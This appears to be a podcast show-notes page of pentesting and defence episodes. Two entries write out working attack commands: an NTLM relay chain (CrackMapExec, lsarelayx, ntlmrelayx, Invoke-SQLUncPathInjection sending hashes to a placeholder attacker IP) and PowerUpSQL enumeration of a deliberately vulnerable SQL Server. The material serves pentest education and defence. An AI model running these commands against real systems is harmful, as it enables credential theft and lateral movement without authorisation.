7MS #420: Tales of Internal Pentest Pwnage - Part 17

Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.

19 Touko 202326min

Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed a two-part GitHub gist that covers: Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

12 Touko 202331min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In today's episode we staged an NTLM relay attack using a vulnerable SQL server. First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled: cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt Then we setup lsarelayx in one window: lsarelayx --host=localhost And in a second window we ran ntlmrelayx.py: python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM Finally, in a third window we triggered authentication from the vulnerable SQL server: Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS Boom! Watch the local usernames and hashes fall out of the victim system. We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this: victim1 victim2 victim3 Then we tweaked the ntlmrelayx command slightly: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt Interestingly(?) only victim2 was attacked. Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server. TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

5 Touko 202332min

Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.

28 Huhti 202355min

Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS). Now it's baked right into PowerShell and the AD Users and Tools console. It's awesome, it's a necessary blue team control for any size company, and you should basically stop reading this and install LAPS now.

21 Huhti 202319min

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode: Download SQL Server here Install SQL via config .ini file Or, install SQL via pure command line Deploy SQL with a service account while also starting TCP/IP and named pipes automagically: setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users" Run PowerUpSQL to find vulnerable SQL servers: $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"} Audit the discovered SQL servers: Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose Fire off stored procedures to catch hashes! Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

14 Huhti 202339min

Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do!

31 Maalis 202354min

Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey. It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of usernames and passwords/hashes to use for lateral movement, test network segmentation, set a UNC path of files to actually encrypt (careful - run in a test lab - NOT in prod!) and more!

24 Maalis 202327min